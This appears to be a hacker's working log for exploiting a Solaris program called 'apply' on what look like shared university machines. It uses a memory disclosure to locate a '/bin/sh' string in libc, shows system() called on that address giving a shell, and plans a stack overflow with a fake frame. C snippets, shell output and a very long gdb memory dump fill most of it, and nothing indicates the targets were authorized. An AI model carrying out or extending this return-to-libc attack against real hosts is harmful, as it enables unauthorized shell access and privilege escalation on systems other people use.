(void) execl(shpath, shell, (const char *)"-c", s, (char *)0);
This might be useful as some sort of binary signature in System().
/var/adm/messages is where the stack-execution notice comes up.
tail -f /var/adm/messages Oct 17 21:51:43 life.dream.net genunix: [ID 533030 kern.notice] NOTICE: apply_actual[1212] attempt to execute code on stack by uid 100
I don’t know if the SIGPIPE error could possibly produce a message in /var/adm/messages, or some other log?? let’s see….
well.. I just tried it out, and nothing is showing up — I only checked dmesg and /var/adm/messages, which may be the same thing.. I’m not sure where else to check.. p.s. no core is dumped with SIGPIPE crashes (at least on target) ;)
Testing PTY
Can we use printf() from the master side?? YES
Check if reads on master are ever > 1?? YES ALWAYS
–More–q
(y or n)? n
Printing the Address from what is specified in the shellcode buffer
uint32_t *addr = &buff3[1560]; fprintf (stderr, "INFO@ 0x%4x\n", *addr);
SSH into apply should be done manually.. Then kick the test off with a CTRL-P for PEEK!
allow me to automate the first half of the apply process:
be using strstr()
const char *strstr(const char *s1, const char *s2);
strstr()
The strstr() function locates the first occurrence of the
string s2 (excluding the terminating null character) in
string s1 and returns a pointer to the located string, or a
null pointer if the string is not found. If s2 points to a
string with zero length (that is, the string ""), the func-
tion returns s1.
Two Ways to Do the Same Thing
I was looking for a simple way to modify my string buffer with a 32-bit address value. The first is ugly, the second is elegant with pointer.
-bash-4.3$ cat test.c; ./test | od -X -A x
#include <sys/types.h>
buf[100];
write_info_addr(uint32_t addr)
{
char b4,b3,b2,b1;
b4 = ( (addr&0xff000000) >> 24);
b3 = ( (addr&0x00ff0000) >> 16);
b2 = ( (addr&0x0000ff00) >> 8);
b1 = ( (addr&0x000000ff) );
printf ("%c%c%c%c", b4,b3,b2,b1);
}
write_info_addr2(uint32_t addr)
{
uint32_t *p = (uint32_t *)&buf[0];
*p = addr;
printf ("%s", buf);
}
main()
{
memset (buf, 0, 100);
write_info_addr(0xdeadbeef);
write_info_addr2(0xdeadbeef);
}
0000000 deadbeef deadbeef
0000008
This below proves how I can call system() with a LibC address pointing towards “/bin/sh” string.. it’s a pretty cool trick.
-bash-4.3$ cat /tmp/system.c; /tmp/system
main()
{
system(0xff32a4f8);
}
$ echo "yo"
yo
$ exit
-bash-4.3$
IT WORKS!!!!! I just found /bin/sh memory address(es) using my memory disclosure!!! <3 This address caused crash at blade60: 0xff324354 This address caused crash at blade57: 0xff324a3c i Tested on 0xff324a40 - another SIGPIPE... I think it's because of HUGE string size.. check out at the end of this article.. So.... I try searching from a distance away: 0xff328354 low and behold, I find a string pointer to /bin/sh on blade60!! WATCH OUT FOR CRASHING DUE TO A LONNGGGGG section of memory with no null char!! I blade it on the 'more' command.
31) cs450-1Higher Level LanguagesProf. C. Offner
0xff3296a8Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-43] or command [cptqx?] : These are the categories of accounts:
1) /bin/sh/bin/sh/bin/sh
This data is automatically logged to log.txt
-bash-4.3$ cat log.txt "/bin/sh\0"@ 0xff3296a8
Cool beans! But I still have to find the system() call address…
That’s going to call for dissecting the opcodes in system(). Most of the instructions are the same but with different parameters… in fact.. Some instructions are perfect copies… But I’m concerned that they are not unique enough .. could they be riddled throughout libc?? The only sure way is to probe my own libc with the signature first.. then on the blade72 one.. then the blade57… if I can match all three of those without issues (duplicates), then i am confident to try on Blade60…
After that, I will learn how I stop whining like a little bitch and learn how to get stack queries working, and find a stack signature that I can search in stack space that will reveal to me what I should set for my buffer overflow %fp contents.. %fp will point to in the overflowed section of the stack where my fake stack frame, providing a good %i0,
WHY SIGPIPE??
Program received signal SIGPIPE, Broken pipe.
0xff31fd1c in _write () from /usr/lib/libc.so.1
(gdb) 0xff324a40 <__tbl_baselg+46>: 0x012c0138
(gdb) This shell is interactive
bazz@blade57[pts/28][~] bazz@blade57[pts/28][~]
bazz@blade57[pts/28][~] exit
exit
(gdb) x/x 0xff324a3c
0xff324a3c <__tbl_baselg+42>: 0x01140120
(gdb) x/x 0xff324a44
0xff324a44 <__tbl_baselg+50>: 0x0143014f
(gdb) x/s 0xff324a44
0xff324a44 <__tbl_baselg+50>: "\001C\001O\001Z\001f\001q\001|\001\207\001\222\001\236\001�\001�\001�\001�\001�\001�\001�\001�\001�\002\b\002\023\002\035\002'\0021\002<\002F\002P\002Z\002c\002m\002w\002\201\002\212\002\224\002\236\002�\002�\002�\002�\002�\002�\002�\002�\002�\002�\003\004\003\f\003\025\003\036\003'\0030\0039\003A\003J\003S\003[\003d\003l\003u\003}\003\206\003\216\003\226\003\237\003�\003�\003�\003�\003�\003�\003�\003�\003�\003�\003�\003�\004\a\004\017\004\026\004\036\004&\004-\0045\004=\004D\004L\004S\004[\004b\004i\004q\004x\004\177\004\207\004\216\004\225\004\234\004�\004�\004�\004�"...
(gdb) x/96x 0xff324a44
0xff324a44 <__tbl_baselg+50>: 0x0143014f 0x015a0166 0x0171017c 0x01870192
0xff324a54 <__tbl_baselg+66>: 0x019e01a9 0x01b301be 0x01c901d4 0x01de01e9
0xff324a64 <__tbl_baselg+82>: 0x01f401fe 0x02080213 0x021d0227 0x0231023c
0xff324a74 <__tbl_baselg+98>: 0x02460250 0x025a0263 0x026d0277 0x0281028a
0xff324a84 <__tbl_baselg+114>: 0x0294029e 0x02a702b1 0x02ba02c3 0x02cd02d6
0xff324a94 <__tbl_baselg+130>: 0x02df02e8 0x02f102fa 0x0304030c 0x0315031e
0xff324aa4 <__tbl_baselg+146>: 0x03270330 0x03390341 0x034a0353 0x035b0364
0xff324ab4 <__tbl_baselg+162>: 0x036c0375 0x037d0386 0x038e0396 0x039f03a7
0xff324ac4 <__tbl_baselg+178>: 0x03af03b7 0x03bf03c7 0x03d003d8 0x03e003e7
0xff324ad4 <__tbl_baselg+194>: 0x03ef03f7 0x03ff0407 0x040f0416 0x041e0426
0xff324ae4 <__tbl_baselg+210>: 0x042d0435 0x043d0444 0x044c0453 0x045b0462
0xff324af4 <__tbl_baselg+226>: 0x04690471 0x0478047f 0x0487048e 0x0495049c
0xff324b04 <__tbl_baselg+242>: 0x04a304aa 0x04b104b9 0x04c004c7 0x04ce3030
0xff324b14 <__four_digits_quick_table+2>: 0x30303030 0x30383030 0x31363030 0x32343030
0xff324b24 <__four_digits_quick_table+18>: 0x33323030 0x34303030 0x34383030 0x35363030
0xff324b34 <__four_digits_quick_table+34>: 0x36343030 0x37323030 0x38303030 0x38383030
0xff324b44 <__four_digits_quick_table+50>: 0x39363031 0x30343031 0x31323031 0x32303031
0xff324b54 <__four_digits_quick_table+66>: 0x32383031 0x33363031 0x34343031 0x35323031
0xff324b64 <__four_digits_quick_table+82>: 0x36303031 0x36383031 0x37363031 0x38343031
0xff324b74 <__four_digits_quick_table+98>: 0x39323032 0x30303032 0x30383032 0x31363032
0xff324b84 <__four_digits_quick_table+114>: 0x32343032 0x33323032 0x34303032 0x34383032
0xff324b94 <__four_digits_quick_table+130>: 0x35363032 0x36343032 0x37323032 0x38303032
0xff324ba4 <__four_digits_quick_table+146>: 0x38383032 0x39363033 0x30343033 0x31323033
0xff324bb4 <__four_digits_quick_table+162>: 0x32303033 0x32383033 0x33363033 0x34343033
(gdb)
0xff324bc4 <__four_digits_quick_table+178>: 0x35323033 0x36303033 0x36383033 0x37363033
0xff324bd4 <__four_digits_quick_table+194>: 0x38343033 0x39323034 0x30303034 0x30383034
0xff324be4 <__four_digits_quick_table+210>: 0x31363034 0x32343034 0x33323034 0x34303034
0xff324bf4 <__four_digits_quick_table+226>: 0x34383034 0x35363034 0x36343034 0x37323034
0xff324c04 <__four_digits_quick_table+242>: 0x38303034 0x38383034 0x39363035 0x30343035
0xff324c14 <__four_digits_quick_table+258>: 0x31323035 0x32303035 0x32383035 0x33363035
0xff324c24 <__four_digits_quick_table+274>: 0x34343035 0x35323035 0x36303035 0x36383035
0xff324c34 <__four_digits_quick_table+290>: 0x37363035 0x38343035 0x39323036 0x30303036
0xff324c44 <__four_digits_quick_table+306>: 0x30383036 0x31363036 0x32343036 0x33323036
0xff324c54 <__four_digits_quick_table+322>: 0x34303036 0x34383036 0x35363036 0x36343036
0xff324c64 <__four_digits_quick_table+338>: 0x37323036 0x38303036 0x38383036 0x39363037
0xff324c74 <__four_digits_quick_table+354>: 0x30343037 0x31323037 0x32303037 0x32383037
0xff324c84 <__four_digits_quick_table+370>: 0x33363037 0x34343037 0x35323037 0x36303037
0xff324c94 <__four_digits_quick_table+386>: 0x36383037 0x37363037 0x38343037 0x39323038
0xff324ca4 <__four_digits_quick_table+402>: 0x30303038 0x30383038 0x31363038 0x32343038
0xff324cb4 <__four_digits_quick_table+418>: 0x33323038 0x34303038 0x34383038 0x35363038
0xff324cc4 <__four_digits_quick_table+434>: 0x36343038 0x37323038 0x38303038 0x38383038
0xff324cd4 <__four_digits_quick_table+450>: 0x39363039 0x30343039 0x31323039 0x32303039
0xff324ce4 <__four_digits_quick_table+466>: 0x32383039 0x33363039 0x34343039 0x35323039
0xff324cf4 <__four_digits_quick_table+482>: 0x36303039 0x36383039 0x37363039 0x38343039
0xff324d04 <__four_digits_quick_table+498>: 0x39323130 0x30303130 0x30383130 0x31363130
0xff324d14 <__four_digits_quick_table+514>: 0x32343130 0x33323130 0x34303130 0x34383130
0xff324d24 <__four_digits_quick_table+530>: 0x35363130 0x36343130 0x37323130 0x38303130
0xff324d34 <__four_digits_quick_table+546>: 0x38383130 0x39363131 0x30343131 0x31323131
(gdb)
0xff324d44 <__four_digits_quick_table+562>: 0x32303131 0x32383131 0x33363131 0x34343131
0xff324d54 <__four_digits_quick_table+578>: 0x35323131 0x36303131 0x36383131 0x37363131
0xff324d64 <__four_digits_quick_table+594>: 0x38343131 0x39323132 0x30303132 0x30383132
0xff324d74 <__four_digits_quick_table+610>: 0x31363132 0x32343132 0x33323132 0x34303132
0xff324d84 <__four_digits_quick_table+626>: 0x34383132 0x35363132 0x36343132 0x37323132
0xff324d94 <__four_digits_quick_table+642>: 0x38303132 0x38383132 0x39363133 0x30343133
0xff324da4 <__four_digits_quick_table+658>: 0x31323133 0x32303133 0x32383133 0x33363133
0xff324db4 <__four_digits_quick_table+674>: 0x34343133 0x35323133 0x36303133 0x36383133
0xff324dc4 <__four_digits_quick_table+690>: 0x37363133 0x38343133 0x39323134 0x30303134
0xff324dd4 <__four_digits_quick_table+706>: 0x30383134 0x31363134 0x32343134 0x33323134
0xff324de4 <__four_digits_quick_table+722>: 0x34303134 0x34383134 0x35363134 0x36343134
0xff324df4 <__four_digits_quick_table+738>: 0x37323134 0x38303134 0x38383134 0x39363135
0xff324e04 <__four_digits_quick_table+754>: 0x30343135 0x31323135 0x32303135 0x32383135
0xff324e14 <__four_digits_quick_table+770>: 0x33363135 0x34343135 0x35323135 0x36303135
0xff324e24 <__four_digits_quick_table+786>: 0x36383135 0x37363135 0x38343135 0x39323136
0xff324e34 <__four_digits_quick_table+802>: 0x30303136 0x30383136 0x31363136 0x32343136
0xff324e44 <__four_digits_quick_table+818>: 0x33323136 0x34303136 0x34383136 0x35363136
0xff324e54 <__four_digits_quick_table+834>: 0x36343136 0x37323136 0x38303136 0x38383136
0xff324e64 <__four_digits_quick_table+850>: 0x39363137 0x30343137 0x31323137 0x32303137
0xff324e74 <__four_digits_quick_table+866>: 0x32383137 0x33363137 0x34343137 0x35323137
0xff324e84 <__four_digits_quick_table+882>: 0x36303137 0x36383137 0x37363137 0x38343137
0xff324e94 <__four_digits_quick_table+898>: 0x39323138 0x30303138 0x30383138 0x31363138
0xff324ea4 <__four_digits_quick_table+914>: 0x32343138 0x33323138 0x34303138 0x34383138
0xff324eb4 <__four_digits_quick_table+930>: 0x35363138 0x36343138 0x37323138 0x38303138
(gdb)
0xff324ec4 <__four_digits_quick_table+946>: 0x38383138 0x39363139 0x30343139 0x31323139
0xff324ed4 <__four_digits_quick_table+962>: 0x32303139 0x32383139 0x33363139 0x34343139
0xff324ee4 <__four_digits_quick_table+978>: 0x35323139 0x36303139 0x36383139 0x37363139
0xff324ef4 <__four_digits_quick_table+994>: 0x38343139 0x39323230 0x30303230 0x30383230
0xff324f04 <__four_digits_quick_table+1010>: 0x31363230 0x32343230 0x33323230 0x34303230
0xff324f14 <__four_digits_quick_table+1026>: 0x34383230 0x35363230 0x36343230 0x37323230
0xff324f24 <__four_digits_quick_table+1042>: 0x38303230 0x38383230 0x39363231 0x30343231
0xff324f34 <__four_digits_quick_table+1058>: 0x31323231 0x32303231 0x32383231 0x33363231
0xff324f44 <__four_digits_quick_table+1074>: 0x34343231 0x35323231 0x36303231 0x36383231
0xff324f54 <__four_digits_quick_table+1090>: 0x37363231 0x38343231 0x39323232 0x30303232
0xff324f64 <__four_digits_quick_table+1106>: 0x30383232 0x31363232 0x32343232 0x33323232
0xff324f74 <__four_digits_quick_table+1122>: 0x34303232 0x34383232 0x35363232 0x36343232
0xff324f84 <__four_digits_quick_table+1138>: 0x37323232 0x38303232 0x38383232 0x39363233
0xff324f94 <__four_digits_quick_table+1154>: 0x30343233 0x31323233 0x32303233 0x32383233
0xff324fa4 <__four_digits_quick_table+1170>: 0x33363233 0x34343233 0x35323233 0x36303233
0xff324fb4 <__four_digits_quick_table+1186>: 0x36383233 0x37363233 0x38343233 0x39323234
0xff324fc4 <__four_digits_quick_table+1202>: 0x30303234 0x30383234 0x31363234 0x32343234
0xff324fd4 <__four_digits_quick_table+1218>: 0x33323234 0x34303234 0x34383234 0x35363234
0xff324fe4 <__four_digits_quick_table+1234>: 0x36343234 0x37323234 0x38303234 0x38383234
0xff324ff4 <__four_digits_quick_table+1250>: 0x39363235 0x30343235 0x31323235 0x32303235
0xff325004 <__four_digits_quick_table+1266>: 0x32383235 0x33363235 0x34343235 0x35323235
0xff325014 <__four_digits_quick_table+1282>: 0x36303235 0x36383235 0x37363235 0x38343235
0xff325024 <__four_digits_quick_table+1298>: 0x39323236 0x30303236 0x30383236 0x31363236
0xff325034 <__four_digits_quick_table+1314>: 0x32343236 0x33323236 0x34303236 0x34383236
(gdb)
0xff325044 <__four_digits_quick_table+1330>: 0x35363236 0x36343236 0x37323236 0x38303236
0xff325054 <__four_digits_quick_table+1346>: 0x38383236 0x39363237 0x30343237 0x31323237
0xff325064 <__four_digits_quick_table+1362>: 0x32303237 0x32383237 0x33363237 0x34343237
0xff325074 <__four_digits_quick_table+1378>: 0x35323237 0x36303237 0x36383237 0x37363237
0xff325084 <__four_digits_quick_table+1394>: 0x38343237 0x39323238 0x30303238 0x30383238
0xff325094 <__four_digits_quick_table+1410>: 0x31363238 0x32343238 0x33323238 0x34303238
0xff3250a4 <__four_digits_quick_table+1426>: 0x34383238 0x35363238 0x36343238 0x37323238
0xff3250b4 <__four_digits_quick_table+1442>: 0x38303238 0x38383238 0x39363239 0x30343239
0xff3250c4 <__four_digits_quick_table+1458>: 0x31323239 0x32303239 0x32383239 0x33363239
0xff3250d4 <__four_digits_quick_table+1474>: 0x34343239 0x35323239 0x36303239 0x36383239
0xff3250e4 <__four_digits_quick_table+1490>: 0x37363239 0x38343239 0x39323330 0x30303330
0xff3250f4 <__four_digits_quick_table+1506>: 0x30383330 0x31363330 0x32343330 0x33323330
0xff325104 <__four_digits_quick_table+1522>: 0x34303330 0x34383330 0x35363330 0x36343330
0xff325114 <__four_digits_quick_table+1538>: 0x37323330 0x38303330 0x38383330 0x39363331
0xff325124 <__four_digits_quick_table+1554>: 0x30343331 0x31323331 0x32303331 0x32383331
0xff325134 <__four_digits_quick_table+1570>: 0x33363331 0x34343331 0x35323331 0x36303331
0xff325144 <__four_digits_quick_table+1586>: 0x36383331 0x37363331 0x38343331 0x39323332
0xff325154 <__four_digits_quick_table+1602>: 0x30303332 0x30383332 0x31363332 0x32343332
0xff325164 <__four_digits_quick_table+1618>: 0x33323332 0x34303332 0x34383332 0x35363332
0xff325174 <__four_digits_quick_table+1634>: 0x36343332 0x37323332 0x38303332 0x38383332
0xff325184 <__four_digits_quick_table+1650>: 0x39363333 0x30343333 0x31323333 0x32303333
0xff325194 <__four_digits_quick_table+1666>: 0x32383333 0x33363333 0x34343333 0x35323333
0xff3251a4 <__four_digits_quick_table+1682>: 0x36303333 0x36383333 0x37363333 0x38343333
0xff3251b4 <__four_digits_quick_table+1698>: 0x39323334 0x30303334 0x30383334 0x31363334
(gdb)
0xff3251c4 <__four_digits_quick_table+1714>: 0x32343334 0x33323334 0x34303334 0x34383334
0xff3251d4 <__four_digits_quick_table+1730>: 0x35363334 0x36343334 0x37323334 0x38303334
0xff3251e4 <__four_digits_quick_table+1746>: 0x38383334 0x39363335 0x30343335 0x31323335
0xff3251f4 <__four_digits_quick_table+1762>: 0x32303335 0x32383335 0x33363335 0x34343335
0xff325204 <__four_digits_quick_table+1778>: 0x35323335 0x36303335 0x36383335 0x37363335
0xff325214 <__four_digits_quick_table+1794>: 0x38343335 0x39323336 0x30303336 0x30383336
0xff325224 <__four_digits_quick_table+1810>: 0x31363336 0x32343336 0x33323336 0x34303336
0xff325234 <__four_digits_quick_table+1826>: 0x34383336 0x35363336 0x36343336 0x37323336
0xff325244 <__four_digits_quick_table+1842>: 0x38303336 0x38383336 0x39363337 0x30343337
0xff325254 <__four_digits_quick_table+1858>: 0x31323337 0x32303337 0x32383337 0x33363337
0xff325264 <__four_digits_quick_table+1874>: 0x34343337 0x35323337 0x36303337 0x36383337
0xff325274 <__four_digits_quick_table+1890>: 0x37363337 0x38343337 0x39323338 0x30303338
0xff325284 <__four_digits_quick_table+1906>: 0x30383338 0x31363338 0x32343338 0x33323338
0xff325294 <__four_digits_quick_table+1922>: 0x34303338 0x34383338 0x35363338 0x36343338
0xff3252a4 <__four_digits_quick_table+1938>: 0x37323338 0x38303338 0x38383338 0x39363339
0xff3252b4 <__four_digits_quick_table+1954>: 0x30343339 0x31323339 0x32303339 0x32383339
0xff3252c4 <__four_digits_quick_table+1970>: 0x33363339 0x34343339 0x35323339 0x36303339
0xff3252d4 <__four_digits_quick_table+1986>: 0x36383339 0x37363339 0x38343339 0x39323430
0xff3252e4 <__four_digits_quick_table+2002>: 0x30303430 0x30383430 0x31363430 0x32343430
0xff3252f4 <__four_digits_quick_table+2018>: 0x33323430 0x34303430 0x34383430 0x35363430
0xff325304 <__four_digits_quick_table+2034>: 0x36343430 0x37323430 0x38303430 0x38383430
0xff325314 <__four_digits_quick_table+2050>: 0x39363431 0x30343431 0x31323431 0x32303431
0xff325324 <__four_digits_quick_table+2066>: 0x32383431 0x33363431 0x34343431 0x35323431
0xff325334 <__four_digits_quick_table+2082>: 0x36303431 0x36383431 0x37363431 0x38343431
(gdb)
0xff325344 <__four_digits_quick_table+2098>: 0x39323432 0x30303432 0x30383432 0x31363432
0xff325354 <__four_digits_quick_table+2114>: 0x32343432 0x33323432 0x34303432 0x34383432
0xff325364 <__four_digits_quick_table+2130>: 0x35363432 0x36343432 0x37323432 0x38303432
0xff325374 <__four_digits_quick_table+2146>: 0x38383432 0x39363433 0x30343433 0x31323433
0xff325384 <__four_digits_quick_table+2162>: 0x32303433 0x32383433 0x33363433 0x34343433
0xff325394 <__four_digits_quick_table+2178>: 0x35323433 0x36303433 0x36383433 0x37363433
0xff3253a4 <__four_digits_quick_table+2194>: 0x38343433 0x39323434 0x30303434 0x30383434
0xff3253b4 <__four_digits_quick_table+2210>: 0x31363434 0x32343434 0x33323434 0x34303434
0xff3253c4 <__four_digits_quick_table+2226>: 0x34383434 0x35363434 0x36343434 0x37323434
0xff3253d4 <__four_digits_quick_table+2242>: 0x38303434 0x38383434 0x39363435 0x30343435
0xff3253e4 <__four_digits_quick_table+2258>: 0x31323435 0x32303435 0x32383435 0x33363435
0xff3253f4 <__four_digits_quick_table+2274>: 0x34343435 0x35323435 0x36303435 0x36383435
0xff325404 <__four_digits_quick_table+2290>: 0x37363435 0x38343435 0x39323436 0x30303436
0xff325414 <__four_digits_quick_table+2306>: 0x30383436 0x31363436 0x32343436 0x33323436
0xff325424 <__four_digits_quick_table+2322>: 0x34303436 0x34383436 0x35363436 0x36343436
0xff325434 <__four_digits_quick_table+2338>: 0x37323436 0x38303436 0x38383436 0x39363437
0xff325444 <__four_digits_quick_table+2354>: 0x30343437 0x31323437 0x32303437 0x32383437
0xff325454 <__four_digits_quick_table+2370>: 0x33363437 0x34343437 0x35323437 0x36303437
0xff325464 <__four_digits_quick_table+2386>: 0x36383437 0x37363437 0x38343437 0x39323438
0xff325474 <__four_digits_quick_table+2402>: 0x30303438 0x30383438 0x31363438 0x32343438
0xff325484 <__four_digits_quick_table+2418>: 0x33323438 0x34303438 0x34383438 0x35363438
0xff325494 <__four_digits_quick_table+2434>: 0x36343438 0x37323438 0x38303438 0x38383438
0xff3254a4 <__four_digits_quick_table+2450>: 0x39363439 0x30343439 0x31323439 0x32303439
0xff3254b4 <__four_digits_quick_table+2466>: 0x32383439 0x33363439 0x34343439 0x35323439
(gdb)
0xff3254c4 <__four_digits_quick_table+2482>: 0x36303439 0x36383439 0x37363439 0x38343439
0xff3254d4 <__four_digits_quick_table+2498>: 0x39323530 0x30303530 0x30383530 0x31363530
0xff3254e4 <__four_digits_quick_table+2514>: 0x32343530 0x33323530 0x34303530 0x34383530
0xff3254f4 <__four_digits_quick_table+2530>: 0x35363530 0x36343530 0x37323530 0x38303530
0xff325504 <__four_digits_quick_table+2546>: 0x38383530 0x39363531 0x30343531 0x31323531
0xff325514 <__four_digits_quick_table+2562>: 0x32303531 0x32383531 0x33363531 0x34343531
0xff325524 <__four_digits_quick_table+2578>: 0x35323531 0x36303531 0x36383531 0x37363531
0xff325534 <__four_digits_quick_table+2594>: 0x38343531 0x39323532 0x30303532 0x30383532
0xff325544 <__four_digits_quick_table+2610>: 0x31363532 0x32343532 0x33323532 0x34303532
0xff325554 <__four_digits_quick_table+2626>: 0x34383532 0x35363532 0x36343532 0x37323532
0xff325564 <__four_digits_quick_table+2642>: 0x38303532 0x38383532 0x39363533 0x30343533
0xff325574 <__four_digits_quick_table+2658>: 0x31323533 0x32303533 0x32383533 0x33363533
0xff325584 <__four_digits_quick_table+2674>: 0x34343533 0x35323533 0x36303533 0x36383533
0xff325594 <__four_digits_quick_table+2690>: 0x37363533 0x38343533 0x39323534 0x30303534
0xff3255a4 <__four_digits_quick_table+2706>: 0x30383534 0x31363534 0x32343534 0x33323534
0xff3255b4 <__four_digits_quick_table+2722>: 0x34303534 0x34383534 0x35363534 0x36343534
0xff3255c4 <__four_digits_quick_table+2738>: 0x37323534 0x38303534 0x38383534 0x39363535
0xff3255d4 <__four_digits_quick_table+2754>: 0x30343535 0x31323535 0x32303535 0x32383535
0xff3255e4 <__four_digits_quick_table+2770>: 0x33363535 0x34343535 0x35323535 0x36303535
0xff3255f4 <__four_digits_quick_table+2786>: 0x36383535 0x37363535 0x38343535 0x39323536
0xff325604 <__four_digits_quick_table+2802>: 0x30303536 0x30383536 0x31363536 0x32343536
0xff325614 <__four_digits_quick_table+2818>: 0x33323536 0x34303536 0x34383536 0x35363536
0xff325624 <__four_digits_quick_table+2834>: 0x36343536 0x37323536 0x38303536 0x38383536
0xff325634 <__four_digits_quick_table+2850>: 0x39363537 0x30343537 0x31323537 0x32303537
(gdb)
0xff325644 <__four_digits_quick_table+2866>: 0x32383537 0x33363537 0x34343537 0x35323537
0xff325654 <__four_digits_quick_table+2882>: 0x36303537 0x36383537 0x37363537 0x38343537
0xff325664 <__four_digits_quick_table+2898>: 0x39323538 0x30303538 0x30383538 0x31363538
0xff325674 <__four_digits_quick_table+2914>: 0x32343538 0x33323538 0x34303538 0x34383538
0xff325684 <__four_digits_quick_table+2930>: 0x35363538 0x36343538 0x37323538 0x38303538
0xff325694 <__four_digits_quick_table+2946>: 0x38383538 0x39363539 0x30343539 0x31323539
0xff3256a4 <__four_digits_quick_table+2962>: 0x32303539 0x32383539 0x33363539 0x34343539
0xff3256b4 <__four_digits_quick_table+2978>: 0x35323539 0x36303539 0x36383539 0x37363539
0xff3256c4 <__four_digits_quick_table+2994>: 0x38343539 0x39323630 0x30303630 0x30383630
0xff3256d4 <__four_digits_quick_table+3010>: 0x31363630 0x32343630 0x33323630 0x34303630
0xff3256e4 <__four_digits_quick_table+3026>: 0x34383630 0x35363630 0x36343630 0x37323630
0xff3256f4 <__four_digits_quick_table+3042>: 0x38303630 0x38383630 0x39363631 0x30343631
0xff325704 <__four_digits_quick_table+3058>: 0x31323631 0x32303631 0x32383631 0x33363631
0xff325714 <__four_digits_quick_table+3074>: 0x34343631 0x35323631 0x36303631 0x36383631
0xff325724 <__four_digits_quick_table+3090>: 0x37363631 0x38343631 0x39323632 0x30303632
0xff325734 <__four_digits_quick_table+3106>: 0x30383632 0x31363632 0x32343632 0x33323632
0xff325744 <__four_digits_quick_table+3122>: 0x34303632 0x34383632 0x35363632 0x36343632
0xff325754 <__four_digits_quick_table+3138>: 0x37323632 0x38303632 0x38383632 0x39363633
0xff325764 <__four_digits_quick_table+3154>: 0x30343633 0x31323633 0x32303633 0x32383633
0xff325774 <__four_digits_quick_table+3170>: 0x33363633 0x34343633 0x35323633 0x36303633
0xff325784 <__four_digits_quick_table+3186>: 0x36383633 0x37363633 0x38343633 0x39323634
0xff325794 <__four_digits_quick_table+3202>: 0x30303634 0x30383634 0x31363634 0x32343634
0xff3257a4 <__four_digits_quick_table+3218>: 0x33323634 0x34303634 0x34383634 0x35363634
0xff3257b4 <__four_digits_quick_table+3234>: 0x36343634 0x37323634 0x38303634 0x38383634
(gdb)
0xff3257c4 <__four_digits_quick_table+3250>: 0x39363635 0x30343635 0x31323635 0x32303635
0xff3257d4 <__four_digits_quick_table+3266>: 0x32383635 0x33363635 0x34343635 0x35323635
0xff3257e4 <__four_digits_quick_table+3282>: 0x36303635 0x36383635 0x37363635 0x38343635
0xff3257f4 <__four_digits_quick_table+3298>: 0x39323636 0x30303636 0x30383636 0x31363636
0xff325804 <__four_digits_quick_table+3314>: 0x32343636 0x33323636 0x34303636 0x34383636
0xff325814 <__four_digits_quick_table+3330>: 0x35363636 0x36343636 0x37323636 0x38303636
0xff325824 <__four_digits_quick_table+3346>: 0x38383636 0x39363637 0x30343637 0x31323637
0xff325834 <__four_digits_quick_table+3362>: 0x32303637 0x32383637 0x33363637 0x34343637
0xff325844 <__four_digits_quick_table+3378>: 0x35323637 0x36303637 0x36383637 0x37363637
0xff325854 <__four_digits_quick_table+3394>: 0x38343637 0x39323638 0x30303638 0x30383638
0xff325864 <__four_digits_quick_table+3410>: 0x31363638 0x32343638 0x33323638 0x34303638
0xff325874 <__four_digits_quick_table+3426>: 0x34383638 0x35363638 0x36343638 0x37323638
0xff325884 <__four_digits_quick_table+3442>: 0x38303638 0x38383638 0x39363639 0x30343639
0xff325894 <__four_digits_quick_table+3458>: 0x31323639 0x32303639 0x32383639 0x33363639
0xff3258a4 <__four_digits_quick_table+3474>: 0x34343639 0x35323639 0x36303639 0x36383639
0xff3258b4 <__four_digits_quick_table+3490>: 0x37363639 0x38343639 0x39323730 0x30303730
0xff3258c4 <__four_digits_quick_table+3506>: 0x30383730 0x31363730 0x32343730 0x33323730
0xff3258d4 <__four_digits_quick_table+3522>: 0x34303730 0x34383730 0x35363730 0x36343730
0xff3258e4 <__four_digits_quick_table+3538>: 0x37323730 0x38303730 0x38383730 0x39363731
0xff3258f4 <__four_digits_quick_table+3554>: 0x30343731 0x31323731 0x32303731 0x32383731
0xff325904 <__four_digits_quick_table+3570>: 0x33363731 0x34343731 0x35323731 0x36303731
0xff325914 <__four_digits_quick_table+3586>: 0x36383731 0x37363731 0x38343731 0x39323732
0xff325924 <__four_digits_quick_table+3602>: 0x30303732 0x30383732 0x31363732 0x32343732
0xff325934 <__four_digits_quick_table+3618>: 0x33323732 0x34303732 0x34383732 0x35363732
(gdb)
0xff325944 <__four_digits_quick_table+3634>: 0x36343732 0x37323732 0x38303732 0x38383732
0xff325954 <__four_digits_quick_table+3650>: 0x39363733 0x30343733 0x31323733 0x32303733
0xff325964 <__four_digits_quick_table+3666>: 0x32383733 0x33363733 0x34343733 0x35323733
0xff325974 <__four_digits_quick_table+3682>: 0x36303733 0x36383733 0x37363733 0x38343733
0xff325984 <__four_digits_quick_table+3698>: 0x39323734 0x30303734 0x30383734 0x31363734
0xff325994 <__four_digits_quick_table+3714>: 0x32343734 0x33323734 0x34303734 0x34383734
0xff3259a4 <__four_digits_quick_table+3730>: 0x35363734 0x36343734 0x37323734 0x38303734
0xff3259b4 <__four_digits_quick_table+3746>: 0x38383734 0x39363735 0x30343735 0x31323735
0xff3259c4 <__four_digits_quick_table+3762>: 0x32303735 0x32383735 0x33363735 0x34343735
0xff3259d4 <__four_digits_quick_table+3778>: 0x35323735 0x36303735 0x36383735 0x37363735
0xff3259e4 <__four_digits_quick_table+3794>: 0x38343735 0x39323736 0x30303736 0x30383736
0xff3259f4 <__four_digits_quick_table+3810>: 0x31363736 0x32343736 0x33323736 0x34303736
0xff325a04 <__four_digits_quick_table+3826>: 0x34383736 0x35363736 0x36343736 0x37323736
0xff325a14 <__four_digits_quick_table+3842>: 0x38303736 0x38383736 0x39363737 0x30343737
0xff325a24 <__four_digits_quick_table+3858>: 0x31323737 0x32303737 0x32383737 0x33363737
0xff325a34 <__four_digits_quick_table+3874>: 0x34343737 0x35323737 0x36303737 0x36383737
0xff325a44 <__four_digits_quick_table+3890>: 0x37363737 0x38343737 0x39323738 0x30303738
0xff325a54 <__four_digits_quick_table+3906>: 0x30383738 0x31363738 0x32343738 0x33323738
0xff325a64 <__four_digits_quick_table+3922>: 0x34303738 0x34383738 0x35363738 0x36343738
0xff325a74 <__four_digits_quick_table+3938>: 0x37323738 0x38303738 0x38383738 0x39363739
0xff325a84 <__four_digits_quick_table+3954>: 0x30343739 0x31323739 0x32303739 0x32383739
0xff325a94 <__four_digits_quick_table+3970>: 0x33363739 0x34343739 0x35323739 0x36303739
